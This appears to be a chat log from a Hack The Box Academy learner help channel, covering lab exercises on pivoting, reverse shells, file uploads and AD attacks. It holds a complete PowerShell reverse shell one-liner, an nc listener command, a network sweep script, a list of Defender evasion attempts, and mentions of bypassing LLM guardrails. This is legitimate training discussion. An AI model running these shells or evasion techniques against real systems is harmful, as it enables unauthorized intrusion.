and there are another pivot machine, and it still block you due to "harmfull software"

the dll deleted every time
i tried
Split Chunks
Certutil Decode
Gzip + Base64
Hex Decode
BitsTransfer from Share
.NET WebClient Copy
Robocopy (bypasses some AV)
XCopy
CMD Copy (sometimes bypasses PS AV hooks)
Run DLL directly from share
Rundll32 registration
no thing works and keep cant bypass this issue, any sugestion ?

that has nothing to do with running as admin

Defender being disabled != protection isn't running, sometimes there's some protection running in real-time

they are two separate things

so, what i should do ?

use the GUI to disable RTP

also the module is above tier 0; so careful with sharing commands

yes sure, the command isnt mention in the module

that includes commands you're using to solve problems/advance

stll same idea, if you have access to disable it from GUI, then the real time protection can be blocked by the terminal

ah yeah admin is required for regsvr32

but that's a separate issue

can't load a dll if it's getting yeeted

yes , because that you must be admin in machine pivot 1 to pivot into the second machine

so the scenario teach you to pivot with admin privs into the second pivot machine?

but privilege escalation is a post-exploit process that you can engage in before pivoting so it's not unheard of to be admin on the first machine you access

this scenario has 3 machines total you visit; foothold - 1st internal - 2nd internal

yes sure, im just asking if you dont have privs in the first machine

Hi , i need a hint for the sql injection fundamentals ( Skills Assessment : What is the password hash for the user 'admin'? )

that's part of post-exploitation process; privesc

ok, what you will do if you didnt have privs in the machine 1 and you want to pivot into macine 2

find/use a tool that doesn't require you to mess with defender

like ?

netsh ?

pretty much every pivoting tool taught allows you to double pivot (albeit in different ways

i use ligolo-ng personally

yup i heared about it, is it possible to perform double pivoting with ligolo-ng ?

help

yes, i practiced on that section to get used to it

you just asked, no need to bump it

just have patience. someone that's completed the assessment recently may help you. I completed the old assessment which had a different look from what I recall

?

It won’t let me type in the password

dm me

dm me

yes it is; it's a security feature to not display the password when you don't supply it in the command line.

@brave field hello

Please can you help me out

• AI Defense
• Skills Assessment
• Struggle getting tokens
  I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand?

Ref back to #general

should be port 9000; also http not https

the reading specifies

also if you go all the way back to the #1234357888114364508 that that message links to; it was resolved

It was DNS.

@finite current don't dm without asking

i'm so sorry....🙏🏻

Hello, I need help for introduction to deserialization attacks skill assesment 2 RCE.
Can someone dm me please?

Hi everyone,

I need help with Active Directory Trust Attacks - Skills Assessment. i have root access on child DC and root domain DC dc.inlanefreight.ad... I've tried all avenue to abuse inter-forest trust to get access to DC03.apexcargo.ad but no luck... anyone that could help with nudge to move forward THANKS....can DM thanks!!!

Did you check sidhistory?

Anyone of the devs here? It would be great if you would add a "Extend Time" Button for the Target VM (similar to PWNbox). Currently doing AEN and i have to restart the VMs for the 15th time now....

Its the + to extend.

Hi community i have a question, im doing the path cibersecurity junior, more or less i can achieve all the exercises of the path, but when i try to resolve the machines i can't, i see commands that i never have seen etc, i only could with 2-3 of tier 0, anyone else succeded the same?

yes i did, i can't dcsync with that group sid

i don't know what happen, probably i'm not doing it right

can i dm?

You can send me what you tried but my notes aren’t too detailed

i did thanks man

Credential hunting in network shares..all tools giving false results..this is possibly the worst exercise on the path so far

Any help?

Has anyone managed to solve the issue of Applications of AI in InfoSec skills assessment returning accuracy 0.0 when uploading the model, but locally the accuracy is around 0.9?
I saw many people asking about it, but no solution so far

Edit: Use the same things as spam classification then fine tune the parameters.

Basic question. Working on the beginning of the XSS module. It says to start the server below to practice, but I do not see any instructions on where the server is located/how to start it. Am I missing something obvious?

it's where the questions are

scroll down click the thing that says 'click here to spawn target'

Ah. Ty

hi, can someone please help me with this question

Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}

Ive tried :
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

but it says Bash USER command not found

and when I try:

GET / HTTP/1.1
Host: 10.129.163.6
User-Agent: Server Administrator

I get the response with alot of text and it says
400 URL must be absolute
501 Protocol scheme User-Agent is not supported

What section is this?

Networking Foundations Skill assessments

this is after you use nc to connect to the port

also [ctrl+v] and [Enter] are placeholders for keypresses

ctrl+v being the ctrl key and v key, and enter being the enter key

[ctrl+v][enter] puts in the sequence ^M then ofc [enter] after goes to the next line

why they have you doing this via nc is beyond me

I need help in "Skills Assessment - File Inclusion", I cannot read the code of apply.php. I don't know what else can I do

ok, so what should I type instead?

what port is it telling you to connect to 😉

for FTP its 21 and for HTTP its 80 right ?

I connected to 80

correct

conveniently for ftp there's an ftp command; http...well that's web

dont understand, I thought I was using the http HTTP/1.1

yes... http... hyper-text transfer protocol... the language of the web

so a browser can generally do the trick (though sometimes curl, or other means if you have to specify a user-agent - it's annoying in browsers)

and now I tried:
printf "GET http://10.129.163.6/ HTTP/1.1\r\nHost: 10.129.163.6\r\nUser-Agent: Server Administrator\r\n\r\n" | nc 10.129.163.6 80

but it responded with :
no port(s) to connect to

but everything IS doable via nc/netcat

and that was after i connected through nc port 80

with netcat it's better to use heredoc instead of piping

nc ip port < file

or herestring
nc ip port <<< "string here"'

dont understand
I already did
nc 10.129.163.6 80

can you give an example

heredocs/herestrings take the string and redirect it to the input of a command

do you mean
nc 10.129.163.6 80 heredocs/herestrings ?

heredoc/herestrings are the name of the redirects

<<< is herestring

so instead of printf "...." you can just do
nc ip 80 <<< "insert your text you put in printf here"

don't put it all in one line :)

also you don't need the http://ip there

how do I not put it all in a line ?

gotcha did some tinkering and found some new things; if you're truly determined to do it all in one line instead of writing it out line-by-line dm me

this btw would be an improperly formatted GET request anyway

you don't specify the IP in a GET request

at least not in the GET portion

GET is for requesting a file location

/ being the webroot

so essentially you're trying to ask it for http://ip:80/http://ip

(in your request at least

also your screenshot you're doing nc ip port "texthere" | nc ip... which is just breaking beyond belief

ok so the file i want to get is http://_static/doais8fj34.js?nonce=3575

Hi guys
Need some helps on network foundation for this question
"In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated)"
I tried the following answer but flagged as incorrect:
Software-Defined Architecture, Software-Defined, SDN
I tried it on lower-case as well, and still marked as incorrect.
Am I missing something?

no

what section is this specifically?

network foundations

that wasn't directed at you, also network foundations is the module

not the section

skill assesments

you have the shorthand there, SDN

bud; i'm aware of what section you're on

someone else also had a question

it's on Internet architecture and wireless technologies

hahah oh my bad, sorry.

Yeah, I found it you have the shorthand SDN - expand that

AHH got it now, thank you

as i said earlier though feel free to dm me for this since I found out several ways for you to get it working properly

are you sure it's in the /api/?

solution says it is.

dm me

seems like the solution is outdated. I'll try again after this xmas.

hello, in Skills Assessment - Pivoting, Tunneling, and Port Forwarding
there are a question + For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

what to do ?

@fathom pendant It’s been a while 😅

yes, it's not there.

1. Discover the internal network, find what exists
2. Pivot through the compromised machine and use remote access protocol
3. Access the workstation
4. Read the flag
   Simple

I guess you already have a compromised host to do the needed ?

I'm working on the "Bypassing ConstrainedLanguage Mode with Runspaces" section in the "Introduction to Windows Evasion Techniques" Module (in the PowerShell ConstrainedLanguage Mode section).

I have written the .exe to get the flag after putting it there but nothing.

||When I put the .exe in the C:\Windows\Tasks dir on the machine it passes my test to show the .exe is working.||

What's going on here? Are they expecting ||an added applocker bypass as well|| in this module?

||Post script I was using utf-16...... OUCH!||

do you run the cmd as admin ?

I am logged into the target machine as alpha. This has no admin privs.
I am supposed to wait for the system to execute something to get the flag - based on the instruction.

Windows Privilege Escalation | Credential Hunting

I'm absolutely lost on this question:

Connect as the bob user and practice decrypting the credentials in the pass.xml file. Submit the contents of the flag.txt on the desktop once you are done.

I followed the module for the pass.xml file, and the PW it gives is wrong. I ran a PowerShell script to find other files, and I can't find anything. What am I missing here?

Any help please?

Sorry - I haven't done that module :/

Did you end up getting this one figured out?

I didn't, no

DM

1. Don't @ me, I was sleeping
2. Ping sweep

Also module is above tier 0, dont share screenshots

ok, did you understand my question?

Are you sure its a different machine (check ipconfig)

yes its diff machine

You should be rdp into a machine on this hop 172.16.6.x not 172.16.5

i did

same

The last octet is wrong

Check your ping sweep again

Also youre gonna be using the creds from the previous question

i made full scan in hole interfaces

idid

Try again, im assuming you did the sweep from the host and not through the proxy

then rdp to that user navigate to c , read the flag , its duplicate to previous user

Im telling you the ip you connected to is wrong

You literally connected to the same machine from a different interface

It's a dual-homed machine

its new machine +user + subnet

Its not a new machine

From the base 172.16.5 machine do ipconfig, from the 172.16.6 machine do ipconfig and you'll see what I mean

you mean that
the machine have 2 ips and users
and i connect to opther user in the diff ip for that machine ?

No

The next hop is a wholly different machine on the 172.16.6 subnet

i know that if you connect to rdp to mahine (two times) one of them will disconnet

RDP is weird sometimes but its bc you connected via a different interface, technically

wrong conclusion, learn what dual-homed means

Also you can rdp to yourself without it kicking you off

i know . its like bridge between two villages

So as I stated earlier, re-run your ping sweep

lets goo

Run it a few times, there is a different ip

$ips = @(); (Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | ? { $_.IPAddress -and $_.IPAddress[0] -notlike "169.254.*" -and $_.IPAddress[0] -notlike "127.*" }) | % { $ip = $_.IPAddress[0]; $mask = $_.IPSubnet[0]; $cidr = (32 - ([convert]::ToString(([Net.IPAddress]::Parse($mask).Address),2).PadLeft(32,'0')).Split('0')[0].Length); if ($cidr -ge 24) { $base = ($ip -split '\.')[0..2] -join '.'; $ips += 1..254 | % { "$base.$_" } } }; $live = @{}; arp -a | Select-String '\d+\.\d+\.\d+\.\d+' | % { $a = ($_ -split '\s+')[1]; if($a -and $ips -contains $a){ $live[$a] = $true } }; $pool = [runspacefactory]::CreateRunspacePool(1,100); $pool.Open(); $jobs = $ips | ? { -not $live[$_] } | % { $ps = [powershell]::Create().AddScript({ param($ip) $up = $false; $p = New-Object Net.NetworkInformation.Ping; try { if($p.Send($ip,1500).Status -eq 'Success'){ $up = $true } } catch {}; if(-not $up){ @(445,139,135,22,80,443,3389) | % { if(-not $up){ try { $t = New-Object Net.Sockets.TcpClient; $c = $t.BeginConnect($ip,$_,$null,$null); if($c.AsyncWaitHandle.WaitOne(500)){ $up = $true }; $t.Close() } catch {} } } }; if($up){ $ip } }).AddArgument($_); $ps.RunspacePool = $pool; @{Pipe=$ps;Handle=$ps.BeginInvoke()} }; $jobs | % { $r = $_.Pipe.EndInvoke($_.Handle); if($r){ $live[$r] = $true }; $_.Pipe.Dispose() }; $pool.Close(); $live.Keys | Sort-Object { [version]$_ }

its better than
the default one😅

are there away when rdp to win host from win host to share files ?
in llinux i use /shared in xfreerdp
are there a way to moving files/tools quicly ?

i try to just copy paste it from rdp to other rdp and its work!
are there other ways?

Has anyone completed windows priv module? I need help regarding something

I am trying to enter the machine via winrm but don't have the admin cred's any workaround's because working with rdp is very slow and annoying

rdp has a share files feature if you poke around a bit before you connect

can i connect to the DC directly utilizing the douple pivot module ?
i finished it, but i want to make the pivoting
from the webshell to the last machine ?

also there are intresting thing, are you tried to compromise the hole DC?

anyone?

if you have the hash, evil-winrm allows you to use those

please help when trying to get a reverse shell this is the error message i get

ip is wrong

the rest are cascading errors because of the first one

thats the tun0 ip

that's the only thing I can tell you, it told you explicitly in the first error why it failed

i'm also assuming you have the listener set up on 443 on your atack host

yes i do

as I said though the rest of the errors are cascading;

You cannot call a method on a null-valued expression

your own vm?

or the pwnbox

im using openvpn so im using the interface tun0

if your own vm
-> make sure you only have one vpn connection sudo killall openvpn then reconnect

and i'm assuming you're running the vpn from within your vm

not outside it

yes inside the vpn

and my listener is directed to the tun0 interface ip

sudo nc -lvnp 443 -s 10.10.15.172

so to answer another question; you only have ONE connection running
ip a -> if multiple tun connections then there's your issue

you can crosscheck the ip tto know if its good

correct

please assist

wsl?

vm

not sure the issue could be some firewall issues. but that looks like it should be right

my bind shell worked fine

bind != reverse

im just stocked with reverse

so different things in play

i have been getting this error only God knows since when

i was able to do it in the pwnbox and my own vm, so again unsure where the issue is on your end

@prisma dawn MarcieLee probably already mentioned, but you don't have the Pwnbox running at the same time as your VPN do you?

no i dont

Maybe try restarting everything, the target, your vm, your host, and try again. maybe ensure your nc is up to date.

and how are you connecting to the listener, did you get the revshell from something like revshells.com?

i have tried both from the module and revshell

which module, section, and question? and which revshell did you pick

https://academy.hackthebox.com/module/115/section/1106

Question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.

modules: shells and paloads

Can you DM me the command you used to connect

i edited the command before running

ok so give me the actual command you ran..

because the one you gave me won't work

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.172',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

ok looks good. yeah i'd make sure your nc is up to date, maybe try restarting everything as well like i mentioned earlier. should work though.

maybe also try another port, like a higher one and/or trying with 0.0.0.0 instead of tun0 (although this shouldn't matter)

all parkages are up to date

nc worked perfectly for bind shells

Hi All, im facing an issue with reverse shells, in the file upload module: i have used the pentestmonkey shell, i have added the tun0 ip address in the file and the port, however when running nc -n port it listens and when uploading the reverse shell no connection is received. any ideas?

nc -n doesn't listen

-lp is what listens

i ment nc -lvnp OUR_PORT

Any ideas?

Upload alone is often not enough to trigger the reverse shell, are you making sure to also execute the rev shell somehow on the server side? For example a php rev shell gets executed when you browse to the uploaded file manually

yes i made sure to access the file
i end up getting WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

Tbh my guess would be that you did not put the correct ip adress?

it would be a good assumption if i was a noob, lol

I used the tun0 ip address, whic is the same as the vpn ip address

The File Upload Attacks module?

Guys for my CPTC Exam lab, i cant see the instance i have to work on to get the 14 flags and I am unable to grab an assessor for my report. Does anyone have any information about this?

When you start your exam environment, you should see all of the exam hosts spin up and a target IP address is also provided. If this is not occurring, you will need to reach out to support and explain what you are seeing on your end and what you have done.

You can't share the exam environment.

Im very sorry that was my bad

So since I did see the screenshot, everything appears to be working correctly.

You will need to download your exam VPN config file if you plan to use your own VM for the exam. After that, you would connect to it just like you would when working through the CPTS module labs and skills assessments. Your entry point IP/target is the very top IP that is displayed in your screenshot, which would be like when you spin up a module lab or skills assessment. Does that make sense?

Yes

Which section?

The Upload Exploitation

Have you tried anything else, aside from the pentest monkey PHP reverse shell?

yes i tried generating reverse shells trough msf, same issue

But no issues getting a webshell working right? Just reverse shells?

exactly, web shells no problem, but reverse shells can get a connection back to my listening server

i have tried multiple ports just to be sure, same issue

Gotcha. Yeah I am not sure what I did for that, but it could just be that reverse shells were shown, but not able to be executed in the lab. I can check my notes tomorrow and see what I did for it. I'd also say, you could first get access with the web shell and enumerate the host a bit to see if perhaps there are FW rules enabled that might be restricting reverse shell connections.

I also thought about that, so I checked the firewall, it was disabled, so i enabled it and added a specific rule to allow the connection not even then, couldn't make it work

I would appreciate if you could check your notes and let me know what you did, cos i cant make it work. and im pretty knowledgeable in networking and coding, but who knows, maybe im missing something.

The target is a public_ip:port; a reverse shell is going to be impossible

the goal is a webshell, not a revshell

whenever you are presented with a public_ip:port -> it's safe to assume that you're not going to get a revshell. This is because those don't have an interface that's connected to the vpn network

While reverse shells are always preferred over web shells, as they provide the most interactive method for controlling the compromised server, they may not always work, and we may have to rely on web shells instead.

directly from the last paragraph of the reading

Yes i assumed it had to be the VPN configuration, however since the example was present int he section I had to try it out,. Good thing its not me then

it's 0 to do with the VPN config

There you go.

it's just how the lab is set up (and a good portion of web labs are set up)

by vpn i mean how it is set up in the cloud. in any case I appreciate the help. thanks for the info

again, not vpn

since you can interact with the target without being connected to the vpn

it's also not cloud afaik

just a container hosted that's extremely locked down

htb VMs must be on cloud either azure or aws, otherwise running them on prem would be very expensive lol

or containers yea

or, hear me out, it's not on-prem and it's still not cloud

well not big cloud like Azure or AWS

more like things like Digital Ocean

maybe colocation centers

either way; it's not really a vpn thing

at least for the public ones

I don't think it's very public how HTB handles the private vms, but it is known that they aren't shared with other users

which is an overhead that's taken into consideration

not to debate but vpn does have to do, for the attaking vm, , the target might be public, but the attacking vm sits within a vpnm so it must allow network access. anyways. thanks for the help. much appreciated

if the target is public: the attacking vm having access to the vpn network doesn't mean shit

since attacking the public ip doesn't interact with the vpn

connection comes back into vpn lol

no, it doesn't

anyways, you solved my issue, and it was bugging the shith out of me

if you're attacking 1.2.3.4:5555; no part of any of the connection protocols interacts with the vpn 10.10.0.1/16 or 10.129.0.0/16 range of IPs available (10.10 being clients and 10.129 being targets)

yes you are actually right, sorry, i wrote it incorrect i was thinking in a reverse shell scenario the public host (victim) initiates an outgoing connection to the attacker's machine. I was thinkin it wrong

I've already given my correct answer on attacking GraphQL questions, but the system still considers my answer wrong, what's wrong ?

Got it now?

Yes

Could be you skipped ahead by mistake 🙂 It can happen

Anyone knows if there is another way of enumerating ESC10? without having to read registry values?
Or is this the only way?

i dont think you can enumerate it without the registry. since the schannel config for CertificateMappingMethods is only stored within the registry itself, you will need to query the registry directly or indirectly. and iirc you need admin privs by default to do this

altho technically speaking you could spot this with behavioral analysis, meaning just trying the attack and analyzing the way CA responds

So the only way is just try the attack and see if it works or not?

unless you have some special permissions setup which allows a low priv user to query that perticular reg key, yeah

https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc10-weak-certificate-mapping-for-schannel-authentication

lol, imagine failing CAPE because I forgot to try to abuse ESC10.

In the Attacking Common Services, Attacking SMB, they don't actually show how to abuse SMB and catch the hash with responder that is so confusing why not show an actual example?

can anyone help me on this task in hackinwordpress m pretty sure that i checked all the directories and didn't find the flag

What was your command?

FUCK FASTER YOU FOOL

use that tool

curl

ffuf no joke

I solved it by using zap proxy, it fuzzes nicely with crawlers

Check first with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt to search for directories

@winged hedge can i dm u ?

Hi Guys, I'm currently stuck at HTB academy LLM Output Attacks module from AI Red Teamer Track for the skilled assessment, ig i got the adminkey for adminbot but im not sure where can i use the key if anyone completed the path please help. Thanks in advance

DM me

• AI Defense
• Skills Assessment
• Struggle getting tokens
• I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand? Please mention or DM so message doesn't get lost. Thanks in advance 🙂